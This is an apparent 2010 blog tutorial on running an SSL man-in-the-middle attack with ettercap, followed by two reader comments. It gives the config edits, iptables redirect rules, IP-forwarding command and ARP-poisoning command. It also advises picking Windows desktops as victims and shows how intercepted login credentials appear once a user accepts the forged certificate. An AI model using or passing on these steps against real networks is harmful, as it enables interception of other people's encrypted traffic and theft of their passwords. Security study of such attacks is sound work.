Monday, March 1, 2010

SSL Man In The Middle with Ettercap

Posted by at 12:37 PM
Playing a bit more with ettercap, this time around we'll look at enabling SSL Man in the Middle attacks so that we can retrieve data from encrypted connections as well as clear-text ones.

The attacker's machine is running ubuntu 9.10, and the victims tested were both ubuntu and windows 7.

Edit /etc/etter.conf and set both the user and group id to 0, this is dangerous if someone has a method for counter attacking against ettercap, but it lets ettercap set iptables rules in order to forward ports for breaking SSL connections and substituting certificates. Those iptables rules are allready in etter.conf, and just need to be uncommented:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

You may also need to enable network forwarding:

#echo 1 > /proc/sys/net/ipv4/ip_forward

To get away from the noisy method used previously it's best to just pick on one host at a time, a quiet nmap of the network should give you an idea of which ip addresses on the network will make a good target, windows desktops are the best option obviously.

All you need to do is fire up ettercap like before but use an extra remote tag and plug in your victim ip address, I chose .24, a windows 7 machine.

#ettercap -Tqi wlan0 -M arp:remote /192.168.168.168/ /192.168.168.24/

This is where the attacker now depends on user ignorance and/or impatience, as when the victim tries to visit a site that uses SSL to encrypt the connection they will receive a giant warning screen telling them that somthing is wrong... which most users promptly ignore...

By accepting the invalid certificate which ettercap has provided them, the attackers machine now sees in cleartext all of the data that should have been encrypted. Furthermore, when ettercap sniffs a login packet, it immediately displays the contents of it to the attacker in a nice easy to read format such as this:

HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com  PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485

Of-course I removed the user-name and password since I don't want to show the world, but you can try this with your own account and see them clear as day.

This attack can be particularly devastating if crafted to target services that use expired, self signed, or otherwise problematic certificates which have made all of their users used to simply ignoring the warning given to them by their browser, the one chance users have to stop and think twice is destroyed.
Labels: , ,

2 comments:

  1. How do I turn off the SSL attack once I have a fake certificate issued? I issued a fake certificate to my target, but now I don't want to issue any fake certs to anyone? How do I clear out that certificate?
    ReplyDelete
  2. Once Ettercap is terminated it will stop offering the fake certificate. If another machine has accepted a fake certificate permanently, then you have to go into the webbrowser's preferences to delete that bad cert.
    ReplyDelete

Subscribe to: Post Comments (Atom)